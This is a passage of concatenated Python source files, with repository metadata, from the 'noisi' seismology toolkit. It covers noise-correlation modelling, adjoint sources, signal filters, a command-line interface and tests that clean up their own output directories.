Read in the csv files of measurement.\n\n\t\tdata = pd.read_csv(msrfile)\n\n\n\t# loop over stationpairs\n\n\t\tcnt_success = 0\n\t\tcnt_lowsnr = 0\n\t\tcnt_lown = 0\n\t\tcnt_overlap = 0\n\t\tcnt_unavail = 0\n\t\tn = len(data)\n\t\tprint('Nr Measurements:')\n\t\tprint(n)\n\t\tprint('*'*16)\n\n\t\tfor i in range(n):\n\n\t\t\tif data.at[i,'snr'] < snr_min and data.at[i,'snr_a'] < snr_min:\n\t\t\t\tcnt_lowsnr += 1\n\t\t\t\tcontinue\n\n\t\t\tif data.at[i,'nstack'] < n_min:\n\t\t\t\tcnt_lown += 1\n\t\t\t\tcontinue\n\n\n\t# ToDo: deal with station pairs with several measurements (with different instruments)\n\t# (At the moment, just all added. Probably fine on this large scale)\n\t# find kernel file\n\t\t\tsta1 = data.at[i,'sta1']\n\t\t\tsta2 = data.at[i,'sta2']\n\t\t\n\t\t\t#if sta1.split('.')[-1][-1] in ['E','N','T','R']:\n\t\t#\t\tmsg = \"Cannot yet handle horizontal components\"\n\t#\t\t\traise NotImplementedError(msg)\n\t#\t\tif sta2.split('.')[-1][-1] in ['E','N','T','R']:\n\t#\t\t\tmsg = \"Cannot yet handle horizontal components\"\n\t#\t\t\traise NotImplementedError(msg)\n\t\t\n\t\t\n\t# ToDo !!! Replace this by a decent formulation, where the channel is properly set !!! 
No error for E, R, T, N\n\t\t\tsta1 = \"*.{}..{}\".format(sta1.split('.')[1],source_config['channel']) # ignoring network: IRIS has sometimes several network codes at same station\n\t\t\tsta2 = \"*.{}..{}\".format(sta2.split('.')[1],source_config['channel']) # ignoring network: IRIS has sometimes several network codes at same station\n\t\t\n\t\t\tkernelfile1 = os.path.join(datadir,'kern',\"{}--{}.{}.npy\".format(sta1,sta2,ix_basis))\n\t\t\tkernelfile2 = os.path.join(datadir,'kern',\"{}--{}.{}.npy\".format(sta2,sta1,ix_basis))\n\t\t\t# Same problem with different network codes.\n\t\t\t# Due to station pairs being in alphabetic order of network.station.loc.cha, different network\n\t\t\t# codes also lead to different ordering.\n\t\t\ttry:\n\t\t\t\tkernelfile = glob(kernelfile1)[0]\n\t\t\texcept IndexError:\n\t\t\t\ttry: \n\t\t\t\t\tkernelfile = glob(kernelfile2)[0]\n\t\t\t\texcept IndexError:\n\t\t\t\t\tkernelfile = kernelfile1 \n\t\t\t\t\t# Check that first, and then complain.\n\n\n\n\n\t# Skip if entry is nan: This is most likely due to no measurement taken because station distance too short\t\n\t\t\tif (isnan(data.at[i,'obs']) and m_type \n\t\t\t\tin ['ln_energy_ratio','energy_diff']):\n\t\t\t\tprint(\"No measurement in dataset for:\")\n\t\t\t\tprint(os.path.basename(kernelfile))\n\t\t\t\tcnt_overlap += 1\n\t\t\t\tcontinue\n\n\t# ...unless somehow the kernel went missing (undesirable case!)\n\n\t\t\tif not os.path.exists(kernelfile):\n\t\t\t\tprint(\"File does not exist:\")\n\t\t\t\tprint(os.path.basename(kernelfile))\n\t\t\t\tcnt_unavail += 1\n\t\t\t\tcontinue\n\n\n\t# load kernel\n\t\t\tkernel = np.load(kernelfile)\n\t\t\tif True in np.isnan(kernel):\n\t\t\t\tprint(\"kernel contains nan, skipping\")\n\t\t\t\tprint(os.path.basename(kernelfile))\n\t\t\t\tcontinue\n\n\n\t# multiply kernel and measurement, add to descent dir.\n\t# always assuming L2 norm here!\n\t\t\n\t\t\telse:\n\n\t\t\t\tif kernel.shape[-1] == 1:\n\n\t\t\t\t\tkernel = kernel[:,0]\n\n\t\t\t\t\tif m_type in ['ln_energy_ratio','energy_diff']:\n\t\t\t\t\t\tkernel *= (data.at[i,'syn'] - data.at[i,'obs'])\n\t\t\t\t\t\n\n\t\t\t\telif kernel.shape[-1] == 2:\n\t\t\t\t\tif m_type in ['ln_energy_ratio','energy_diff']:\n\t\t\t\t\t\tkernel[:,0] *= (data.at[i,'syn'] - data.at[i,'obs'])\n\t\t\t\t\t\tkernel[:,1] *= (data.at[i,'syn_a'] - data.at[i,'obs_a'])\n\t\t\t\t\t\tkernel = kernel[:,0] + kernel[:,1]\n\t\t\t\t\t#if m_type in ['envelope']:\n\t\t\t\t#\t\tkernel = kernel[:,0] + kernel[:,1]\n\t\t\t\tcnt_success += 1 # yuhu\n\n\t\t\t\n\t\n\t\t\t\n\t\t# collect\n\t\t\tgradient[ix_basis,:] += kernel * var_weights[ix_basis]\n\t\t\tdel kernel\n\n# save\n\tif save_all:\n\t\twarn('This option is discontinued, because all the single kernels are\\\n\t\t\tavailable in the kern/ directory.')\n\n\n\tif normalize_gradient:\n\t\tgradient /= np.abs(gradient).max()\n\t\n\tkernelfile = os.path.join(datadir,'grad','grad_all.npy')\n\tnp.save(kernelfile,gradient)\n\n\t# output metadata\n\t\t\n\twith open(outfile,'a') as fh:\n\n\t\tfh.write('Analyzed %g station pairs of %g successfully.\\n' %(cnt_success,n))\n\t\tfh.write('No data found for %g station pairs.\\n' %cnt_unavail)\n\t\tfh.write('No measurement taken for %g station pairs due to short interstation distance.\\n' %cnt_overlap) \n\t\tfh.write('Signal to noise ratio below threshold for %g station pairs.\\n' %cnt_lowsnr)\n\t\tfh.write('Number of staacked windows below threshold for %g station pairs.\\n' 
%cnt_lown)\n\t\tfh.write('\\nParameters:==============================================================\\n')\n\t\tfh.write('Source dir: %s \\n' %source_model)\n\t\tfh.write('Step: %g' %int(step))\n\t\tfh.write('Minimum SNR: %g' %snr_min)\n\t\tfh.write('Minimum stack length: %g' %int(n_min))\n\t\tfh.write('Save all interstation gradients: %s' %str(save_all))\n\t\tfh.write('\\n=========================================================================\\n')\n\t\tfh.write('Project:\\n')\n\t\t# append configurations\n\t\tcfg = open(os.path.join(source_config['project_path'],'config.json')).read()\n\t\tfh.write(cfg)\n\t\tfh.write('\\n=========================================================================\\n')\n\t\tfh.write('Source model:\\n')\n\t\tfh.write(json.dumps(source_config))\n\t\tfh.write('\\n=========================================================================\\n')\n\t\tfh.write('Measurement:\\n')\n\t\tcfg = open(os.path.join(source_config['source_path'],'measr_config.json')).read()\n\t\tfh.write(cfg)\n\n\t\n"
},
{
"alpha_fraction": 0.6992031931877136,
"alphanum_fraction": 0.7151394486427307,
"avg_line_length": 26.83333396911621,
"blob_id": "6b2c844e5379fece8c021f95a56e6406d466c579",
"content_id": "16aeab3a95b1610b3c9d5efae7399420b6061cd6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 502,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 18,
"path": "/noisi/test/test_zz_noisi.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport sys\n\n\ndef test_zz_noisi():\n\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/corr\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/corr\")\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/adjt\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/adjt\")\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/kern\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/kern\")\n\n\tif os.path.exists(\"test/testdata/testsrc/step_0/grad\"):\n\t\tos.system(\"rm -rf test/testdata/testsrc/step_0/grad\")\n\n"
},
{
"alpha_fraction": 0.5821782350540161,
"alphanum_fraction": 0.5957095623016357,
"avg_line_length": 25.814159393310547,
"blob_id": "f4b32589e8bf3d55b33c1e299a57357c4e51bed1",
"content_id": "7d8fde7cb10b4b73a4bb99703ea5662d4414cbd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3030,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 113,
"path": "/noisi/scripts/adjnt_functs.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom math import pi\n#from noisi.scripts import measurements as rm\nfrom noisi.util import windows as wn\nfrom scipy.signal import fftconvolve\nfrom scipy.signal import hilbert\n\n\n\n\ndef log_en_ratio_adj(corr_o,corr_s,g_speed,window_params):\n\n success = False\n\n window = wn.get_window(corr_o.stats,g_speed,window_params)\n win = window[0]\n #msr_o = rm.log_en_ratio(corr_o,g_speed,window_params)\n #msr_s = rm.log_en_ratio(corr_s,g_speed,window_params)\n data = wn.my_centered(corr_s.data,corr_o.stats.npts)\n\n if window[2] == True:\n sig_c = corr_s.data * win\n sig_a = corr_s.data * win[::-1]\n E_plus = np.trapz(np.power(sig_c,2))*corr_s.stats.delta\n E_minus = np.trapz(np.power(sig_a,2))*corr_s.stats.delta\n # to win**2\n u_plus = sig_c * win\n u_minus = sig_a * win[::-1]\n #adjt_src = 2./pi * (msr_s-msr_o) * (u_plus / E_plus - u_minus / E_minus)\n # I don't know where that factor 1/pi came from. Not consistent with new derivation of kernels\n adjt_src = 2. * (u_plus / E_plus - u_minus / E_minus)\n success = True\n else:\n adjt_src = win-win+np.nan\n return adjt_src, success\n\ndef windowed_waveform(corr_o,corr_s,g_speed,window_params):\n success = False\n window = wn.get_window(corr_o.stats,g_speed,window_params)\n win = window[0] + window[0][::-1]\n if window[2]:\n\n u_s = np.multiply(win,corr_s.data)\n u_o = np.multiply(win,corr_o.data)\n\n adjt_src = np.multiply(win,(u_s-u_o))\n success = True\n else:\n adjt_src = win-win+np.nan\n\n return adjt_src, success\n\n\ndef square_envelope(corr_o,corr_s,g_speed,\n window_params):\n success = False\n env_s = corr_s.data**2 + np.imag(hilbert(corr_s.data))**2\n env_o = corr_o.data**2 + np.imag(hilbert(corr_o.data))**2\n d_env_1 = 2. * corr_s.data \n d_env_2 = (2. * np.imag(hilbert(corr_s.data)))\n\n u1 = (env_s - env_o) * d_env_1\n u2 = np.imag(hilbert((env_s - env_o) * d_env_2))\n\n adjt_src = u1 - u2\n \n success = True\n return adjt_src, success\n\n\n\n\ndef energy(corr_o,corr_s,g_speed,window_params):\n\n success = False\n\n window = wn.get_window(corr_o.stats,g_speed,window_params)\n\n #if window_params['causal_side']:\n win = window[0]\n #else:\n # win = window[0][::-1]\n\n if window[2]:\n u1 = 2* np.multiply(np.power(win,2),corr_s.data)\n u2 = 2* np.multiply(np.power(win[::-1],2),corr_s.data)\n adjt_src = [u1,u2]\n success = True\n else:\n adjt_src = [win-win+np.nan,win-win+np.nan]\n\n return adjt_src, success\n\n\n\n\ndef get_adj_func(mtype):\n if mtype == 'ln_energy_ratio':\n func = log_en_ratio_adj\n\n elif mtype == 'energy_diff':\n func = energy\n\n elif mtype == 'windowed_waveform':\n func = windowed_waveform\n\n elif mtype == 'square_envelope':\n func = square_envelope\n\n else:\n msg = 'Measurement functional %s not currently implemented.' %mtype\n raise ValueError(msg)\n return func\n"
},
{
"alpha_fraction": 0.719197690486908,
"alphanum_fraction": 0.7421203255653381,
"avg_line_length": 25.769229888916016,
"blob_id": "686e4af3bad59a9154d8a33e65d350ac051d2bec",
"content_id": "2b84397ab7daa71b3ea3c894712866e7e0b632bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 349,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 13,
"path": "/noisi/__init__.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import sys\nimport mpi4py\nimport os\n_ROOT = os.path.abspath(os.path.dirname(__file__))\nprint('='*80)\nprint(\"NOISI toolkit\")\nprint(\"Python version: \"+sys.version)\nprint(\"mpi4py version: \"+mpi4py.__version__)\nprint(_ROOT)\nprint('='*80)\nfrom mpi4py import MPI\nfrom .my_classes.wavefield import WaveField\nfrom .my_classes.noisesource import NoiseSource\n\n"
},
{
"alpha_fraction": 0.6148970127105713,
"alphanum_fraction": 0.6228209137916565,
"avg_line_length": 18.090909957885742,
"blob_id": "0c5cc89fbd2d7bccbcbb601cd8c363491709221e",
"content_id": "1895401725ca4f1bac9b94ef17a1ebe8778b612b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 631,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 33,
"path": "/noisi/util/add_noise_to_data_or_synthetics.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom glob import glob\nfrom obspy import read\nimport sys\n\nif __name__ == '__main__':\n\n\tdirectory = sys.argv[1]\n\n\tperc_of_max = float(sys.argv[2])\n\n\ttry:\n\t\tformat = sys.argv[3]\n\texcept IndexError:\n\t\tformat = 'sac'\n\n\ttry:\n\t\to = sys.argv[4]\n\texcept IndexError:\n\t\to = input('Are you sure you want to add noise? [n]/yes:\\n')\n\n\n\n\ttraces = glob(directory +'/*.'+format.upper())\n\ttraces += glob(directory + '/*.'+format.lower())\n\t\n\tif o != 'yes':\n\t\tsys.exit(\"Nothing added.\")\n\telse:\n\t\tfor t in traces:\n\t\t\ttr = read(t)[0]\n\t\t\ttr.data += np.random.randn(len(tr.data))*tr.data.max()*perc_of_max\n\t\t\ttr.write(t,format=format)\n\n"
},
{
"alpha_fraction": 0.6951530575752258,
"alphanum_fraction": 0.7283163070678711,
"avg_line_length": 34.54545593261719,
"blob_id": "d9d00c1e5441ac64c5178cb707a1d0a8c7b9d433",
"content_id": "7e47bc8dc4d9114c4a5d909493dfa4b6e4750fa7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 784,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 22,
"path": "/noisi/test/test_smoothing.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\n\ndef test_smoothing():\n\t\n\tos.mkdir('test/testdata/testsrc/step_0/grad')\n\tos.system('python util/smoothing.py test/testdata/testsrc/step_0/grad_archived/grad_all.npy \\\n\t\ttest/testdata/testsrc/step_0/grad/grad_smooth.npy test/testdata/sourcegrid.npy \\\n\t\t10.0 95 1e-16')\n\n\t# assert the results are the same\n\t# ToDo: path\n\t#n1 = NoiseSource('test/testdata/testsrc/step_1_archived/starting_model.h5')\n\t#n2 = NoiseSource('test/testdata/testsrc/step_1/starting_model.h5')\n\n\tgrad_old = np.load('test/testdata/testsrc/step_0/grad_archived/grad_smooth.npy')\n\tgrad = np.load('test/testdata/testsrc/step_0/grad/grad_smooth.npy')\n\t\n\tassert (abs(grad - grad_old)/grad_old*100.).max() < 1.e-16 \n\n\t# remove stuff\n\tos.system('rm -rf test/testdata/testsrc/step_0/grad/')\n\t\n"
},
{
"alpha_fraction": 0.6990769505500793,
"alphanum_fraction": 0.7058461308479309,
"avg_line_length": 24,
"blob_id": "ec4fb5ca623e95a20237520e0764cdda85e330fd",
"content_id": "9650e1d77c1c32dcf125717da48f4c024f67c338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1625,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 65,
"path": "/noisi/scripts/run_preprocessing_data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport numpy as np\nimport os\nfrom glob import glob\nfrom obspy import read\nfrom noisi.util.windows import my_centered\nfrom obspy.signal.interpolation import plot_lanczos_windows\n\n\n#ToDo pass in all the now default options\ndef run_preprocess_data(source,bandpass=None,decimator=None,Fs_new=None,overwrite=False,fmt='sac'):\n\n\tdatalst = os.path.join(source,'observed_correlations','*.'+fmt.lower())\n\tdata = glob(datalst)\n\tdatalst = os.path.join(source,'observed_correlations','*.'+fmt.upper())\n\tdata.extend(glob(datalst))\n\n\tif data == []:\n\t\tprint('No data found.')\n\t\treturn()\n\n\tif not overwrite:\n\t\toutdir = os.path.join(source,'processed_correlations')\n\t\tos.mkdir(outdir)\n\telse:\n\t\toutdir = os.path.join(source,'observed_correlations')\n\n\n\tfor f in data:\n\n\t\ttry:\n\t\t\ttr = read(f)[0]\n\t\texcept:\n\t\t\tprint(\"Could not read file:\")\n\t\t\tprint(f)\t\n\t\t\tcontinue\n\n\t\tif bandpass is not None:\n\n\t\t\t# Using zerophase is essential for correlation\n\t\t\ttr.filter('bandpass',\n\t\t\t\tfreqmin = bandpass[0],\n\t\t\t\tfreqmax = bandpass[1],\n\t\t\t\tcorners = bandpass[2],\n\t\t\t\tzerophase=True)\n\n\n\t\tif decimator is not None:\n\n\t\t\ttr.decimate(decimator)\n\n\n\t\tif Fs_new is not None:\n\n\t\t\tif Fs_new < tr.stats.sampling_rate:\n\t\t\t\tprint('HAVE YOU filtered?')\n\t\t\tplot_lanczos_windows(a=40,filename='lanczos_response.eps')\n\t\t\ttr.interpolate(Fs_new, method='lanczos',a=40)\n\n\t\tif tr.stats.npts % 2 == 0:\n\t\t\ttr.data = my_centered(tr.data,tr.stats.npts-1)\n\n\t\ttr.write(os.path.join(outdir,os.path.basename(f)),format=fmt)\n\tprint('Preprocessing complete:')\n\tprint('Please rename folders, measurement will be taken on observed_correlations folder.')\n"
},
{
"alpha_fraction": 0.6052837371826172,
"alphanum_fraction": 0.6154598593711853,
"avg_line_length": 32.181819915771484,
"blob_id": "2d44441620045f90e35cb3ee3411382357515675",
"content_id": "c6d6b9a72547cc626813fd981d48bf591345abca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5110,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 154,
"path": "/noisi/util/filter.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------\n# with modifications from obspy \n# Modifications: Do not apply the filter, but only return it.\n#\n#\n# Filename: filter.py\n# Purpose: Various Seismogram Filtering Functions\n# Author: Tobias Megies, Moritz Beyreuther, Yannik Behr\n# Email: [email protected]\n#\n# Copyright (C) 2009 Tobias Megies, Moritz Beyreuther, Yannik Behr\n# --------------------------------------------------------------------\n\nimport warnings\nfrom scipy.signal import iirfilter\ntry:\n from scipy.signal import zpk2sos, sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\n from obspy.signal._sosfilt import _zpk2sos as zpk2sos\nfrom scipy.signal import cheb2ord, cheby2\n\n\"\"\"\nVarious Seismogram Filtering Functions from obspy\n\n:copyright:\n The ObsPy Development Team ([email protected])\n:license:\n GNU Lesser General Public License, Version 3\n (https://www.gnu.org/copyleft/lesser.html)\n\"\"\"\n\ndef cheby2_lowpass(df,freq,maxorder=8):\n # From obspy\n nyquist = df * 0.5\n # rp - maximum ripple of passband, rs - attenuation of stopband\n rp, rs, order = 1, 96, 1e99\n ws = freq / nyquist # stop band frequency\n wp = ws # pass band frequency\n # raise for some bad scenarios\n if ws > 1:\n ws = 1.0\n msg = \"Selected corner frequency is above Nyquist. \" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n while True:\n if order <= maxorder:\n break\n wp = wp * 0.99\n order, wn = cheb2ord(wp, ws, rp, rs, analog=0)\n (z, p, k) = cheby2(order, rs, wn, btype='low', analog=0, output='zpk')\n return zpk2sos(z, p, k)\n\n\ndef bandpass(freqmin, freqmax, df, corners=4):\n \"\"\"\n Butterworth-Bandpass Filter.\n\n Filter data from ``freqmin`` to ``freqmax`` using ``corners``\n corners.\n The filter uses :func:`scipy.signal.iirfilter` (for design)\n and :func:`scipy.signal.sosfilt` (for applying the filter).\n\n :type data: numpy.ndarray\n :param data: Data to filter.\n :param freqmin: Pass band low corner frequency.\n :param freqmax: Pass band high corner frequency.\n :param df: Sampling rate in Hz.\n :param corners: Filter corners / order.\n :param zerophase: If True, apply filter once forwards and once backwards.\n This results in twice the filter order but zero phase shift in\n the resulting filtered trace.\n :return: Filtered data.\n \"\"\"\n fe = 0.5 * df\n low = freqmin / fe\n high = freqmax / fe\n # raise for some bad scenarios\n if high > 1:\n high = 1.0\n msg = \"Selected high corner frequency is above Nyquist. 
\" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n if low > 1:\n msg = \"Selected low corner frequency is above Nyquist.\"\n raise ValueError(msg)\n z, p, k = iirfilter(corners, [low, high], btype='band',\n ftype='butter', output='zpk')\n sos = zpk2sos(z, p, k)\n return sos\n\ndef lowpass(freq, df, corners=4):\n \"\"\"\n Butterworth-Lowpass Filter.\n\n Filter data removing data over certain frequency ``freq`` using ``corners``\n corners.\n The filter uses :func:`scipy.signal.iirfilter` (for design)\n and :func:`scipy.signal.sosfilt` (for applying the filter).\n\n :type data: numpy.ndarray\n :param data: Data to filter.\n :param freq: Filter corner frequency.\n :param df: Sampling rate in Hz.\n :param corners: Filter corners / order.\n :param zerophase: If True, apply filter once forwards and once backwards.\n This results in twice the number of corners but zero phase shift in\n the resulting filtered trace.\n :return: Filtered data.\n \"\"\"\n fe = 0.5 * df\n f = freq / fe\n # raise for some bad scenarios\n if f > 1:\n f = 1.0\n msg = \"Selected corner frequency is above Nyquist. \" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n z, p, k = iirfilter(corners, f, btype='lowpass', ftype='butter',\n output='zpk')\n sos = zpk2sos(z, p, k)\n return sos\n\n\ndef highpass(freq, df, corners=4):\n \"\"\"\n Butterworth-Highpass Filter.\n\n Filter data removing data below certain frequency ``freq`` using\n ``corners`` corners.\n The filter uses :func:`scipy.signal.iirfilter` (for design)\n and :func:`scipy.signal.sosfilt` (for applying the filter).\n\n :type data: numpy.ndarray\n :param data: Data to filter.\n :param freq: Filter corner frequency.\n :param df: Sampling rate in Hz.\n :param corners: Filter corners / order.\n :param zerophase: If True, apply filter once forwards and once backwards.\n This results in twice the number of corners but zero phase shift in\n the resulting filtered trace.\n :return: Filtered data.\n \"\"\"\n fe = 0.5 * df\n f = freq / fe\n # raise for some bad scenarios\n if f > 1:\n msg = \"Selected corner frequency is above Nyquist.\"\n raise ValueError(msg)\n z, p, k = iirfilter(corners, f, btype='highpass', ftype='butter',\n output='zpk')\n sos = zpk2sos(z, p, k)\n return sos\n"
},
{
"alpha_fraction": 0.6788124442100525,
"alphanum_fraction": 0.7152496576309204,
"avg_line_length": 36.04999923706055,
"blob_id": "fab182ea0066c2b89bd58917790ab730215b6b12",
"content_id": "cad0d5d7b982ea4c1bdf9780713d5af363b5d9ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 20,
"path": "/noisi/test/test_process.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import h5py\nimport os\n\ndef test_process():\n\t# run preprocessing\n\tos.system('noisi preprocess_synthetics test/testdata/testsrc/')\n\t# compare\n\tf1 = h5py.File('test/testdata/testsrc/wavefield_processed/NET.STA1..CHA.h5')\n\tf2 = h5py.File('test/testdata/testsrc/wavefield_processed_archived/NET.STA1..CHA.h5')\n\n\tassert ((f1['data'][:][0]-f2['data'][:][0])/\n\t\tf1['data'][:][0]).max() < 1.e-6\n\t\n\tf1 = h5py.File('test/testdata/testsrc/wavefield_processed/NET.STA2..CHA.h5')\n\tf2 = h5py.File('test/testdata/testsrc/wavefield_processed_archived/NET.STA2..CHA.h5')\n\n\tassert f1['stats'].attrs['reference_station'] == f2['stats'].attrs['reference_station']\n\n\t# delete preprocessed directory\n\tos.system('rm -rf test/testdata/testsrc/wavefield_processed/')\n"
},
{
"alpha_fraction": 0.5677412748336792,
"alphanum_fraction": 0.5687456130981445,
"avg_line_length": 39.31174087524414,
"blob_id": "be3b1d35cd4ebbb369702e0da09461db2ab91b5f",
"content_id": "4a1258d67c702d7bdba37d167f120cc942dc9803",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9957,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 247,
"path": "/noisi/main.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function\nimport sys\nimport os\nimport io\nimport click\nimport json\nimport time\n\nfrom noisi.scripts.source_grid import setup_sourcegrid as setup_sgrid\nfrom noisi.scripts.source_grid_gauss import setup_sourcegrid_gauss as setup_sgrid_gauss\nfrom noisi.scripts.run_correlation import run_corr\nfrom noisi.util.prepare_sem_input import prepare_specfem_input\nfrom noisi.scripts.run_measurement import run_measurement\nfrom noisi.scripts.run_adjointsrcs import run_adjointsrcs\nfrom noisi.scripts.run_kernel import run_kern\nfrom noisi.scripts.run_preprocessing import run_preprocessing\nfrom noisi.scripts.run_preprocessing_data import run_preprocess_data\nfrom noisi.scripts.assemble_gradient import assemble_ascent_dir\nfrom noisi.util.setup_new import setup_proj\[email protected]()\ndef run():\n \"\"\"\n Main routine for noise correlation modeling and noise source inversion.\n \"\"\"\n pass\n \n\n###########################################################################\n### Setting up a new project\n###########################################################################\[email protected](help='Initialize a new project.')\[email protected]('project_name')\ndef setup_project(project_name):\n if os.path.exists(project_name):\n click.echo('Project exists already, must give it a new name.')\n exit()\n else:\n setup_proj(project_name)\n\n click.secho(\"Copied default config.json to project directory, please edit. Use setup_gaussian_grid.ipynb to visually setup gaussian grid.\")\n\n\n###########################################################################\n### Setting up the discretized source grid\n########################################################################### \[email protected](help='Determine the source grid and get specfem STATIONS file.')\[email protected]('project_path')\ndef setup_sourcegrid(project_path):\n \n conf = json.load(open(os.path.join(project_path,'config.json')))\n \n if conf['gauss_grid']:\n setup_sgrid_gauss(os.path.join(project_path,'config.json'))\n else:\n setup_sgrid(os.path.join(project_path,'config.json'))\n\n\n###########################################################################\n### Initialize a source model\n########################################################################### \[email protected](help='Initialize a new source model.')\[email protected]('source_model')\ndef setup_source(source_model):\n\n if os.path.exists(source_model):\n click.echo('Source exists already, must give it a new name.')\n exit()\n\n if not os.path.exists('config.json'):\n click.echo('No config file for project found \\\n (detailing e.g. source grid). Run setup_project first.')\n exit()\n\n os.makedirs(os.path.join(source_model,'step_0'))\n os.mkdir(os.path.join(source_model,'observed_correlations'))\n \n for d in ['adjt','grad','corr','kern']:\n os.mkdir(os.path.join(source_model,'step_0',d))\n\n from . 
import _ROOT\n \n with io.open(os.path.join(_ROOT,'config','source_config.json'),'r') as fh:\n conf = json.loads(fh.read())\n conf['date_created'] = str(time.strftime(\"%Y.%m.%d\"))\n conf['project_name'] = os.path.basename(os.getcwd())\n conf['project_path'] = os.getcwd()\n conf['source_name'] = source_model\n conf['source_path'] = os.path.abspath(source_model)\n \n with io.open(os.path.join(source_model,'source_config.json'),'w') as fh:\n cf = json.dumps(conf,sort_keys=True, indent=4, separators=(\",\", \": \"))\n fh.write(cf)\n \n with io.open(os.path.join(_ROOT,'config','measr_config.json'),'r') as fh:\n conf = json.loads(fh.read())\n conf['date_created'] = str(time.strftime(\"%Y.%m.%d\"))\n \n with io.open(os.path.join(source_model,'measr_config.json'),'w') as fh:\n cf = json.dumps(conf,sort_keys=True, indent=4, separators=(\",\", \": \"))\n fh.write(cf)\n \n from . import _ROOT\n os.system('cp {} {}'.format(os.path.join(_ROOT,'jnotebks/\\\nsetup_noisesource.ipynb'),\n source_model)) \n os.system('cp {} {}'.format(os.path.join(_ROOT,'util/setup_noisesource.py'),\n source_model))\n os.system('cp {} {}'.format(os.path.join(_ROOT,\n 'util/wavefield_from_instaseis.py'),source_model))\n click.secho(\"Copied default source_config.json and measr_config.json \\\nto source model directory, please edit. \\\nPlease run setup_noisesource.ipynb or setup_noisesource.py after editing to \\\ncreate starting model.\")\n \n\n###########################################################################\n### Preprocess the sytnthetic wavefields\n########################################################################### \[email protected](help='Filter & truncate synthetics before correlation.')\[email protected]('source_model')\ndef preprocess_synthetics(source_model):\n source_model = os.path.join(source_model,'source_config.json')\n source_config = json.load(open(source_model))\n if source_config['preprocess_do']:\n \n dir = os.path.join(source_config['source_path'],'wavefield_processed')\n \n try:\n os.mkdir(dir)\n except:\n pass \n \n run_preprocessing(source_config)\n\n\n###########################################################################\n### Correlations <3\n###########################################################################\[email protected](help='Calculate correlations for selected source model.')\[email protected]('source_model')\[email protected]('step')\ndef correlation(source_model,step):\n source_model = os.path.join(source_model,'source_config.json')\n run_corr(source_model,step)\n \n\n###########################################################################\n### Measure and get adjoint sources\n###########################################################################\[email protected](help='Run measurement and adjoint sources.')\[email protected]('source_model')\n# To do: Include a --test option that produces only plots \n# To do: include a get_parameters_options or something, so that there is no \n# extra step necessary in run_measurement\[email protected]('step')\[email protected]('--ignore_network',is_flag=True)\[email protected]('--step_test',is_flag=True)\ndef measurement(source_model,step,ignore_network,step_test):\n \n measr_config = os.path.join(source_model,'measr_config.json')\n source_model = os.path.join(source_model,'source_config.json')\n \n run_measurement(source_model,measr_config,int(step),ignore_network,\n step_test)\n if not step_test:\n 
run_adjointsrcs(source_model,measr_config,int(step),ignore_network)\n\n\n###########################################################################\n### Get kernels (without residuals multiplied)\n###########################################################################\[email protected](help='Calculate preliminary kernels.')\[email protected]('source_model')\[email protected]('step')\[email protected]('--ignore_network',is_flag=True)\ndef kernel(source_model,step,ignore_network):\n source_model = os.path.join(source_model,'source_config.json')\n run_kern(source_model,step,ignore_network=ignore_network)\n\n\n###########################################################################\n### Step length test forward model\n###########################################################################\[email protected](help='Calculate fewer correlations for step length test.')\[email protected]('source_model')\[email protected]('step')\ndef step_test(source_model,step):\n source_model = os.path.join(source_model,'source_config.json')\n run_corr(source_model,step,steplengthrun=True)\n\n\n###########################################################################\n### Assemble the gradient by multplying kernels by residuals and summing\n###########################################################################\[email protected](help='Assemble ascent direction from spatial kernels and \\\nmeasurements')\[email protected]('source_model')\[email protected]('step')\[email protected]('--snr_min',default=0.0)\[email protected]('--n_min',default=0)\[email protected]('--normalize',default=False)\ndef gradient(source_model,step,snr_min,n_min,normalize):\n snr_min = float(snr_min)\n source_model = os.path.join(source_model,'source_config.json')\n assemble_ascent_dir(source_model,step,snr_min,\n n_min,normalize_gradient=normalize)\n 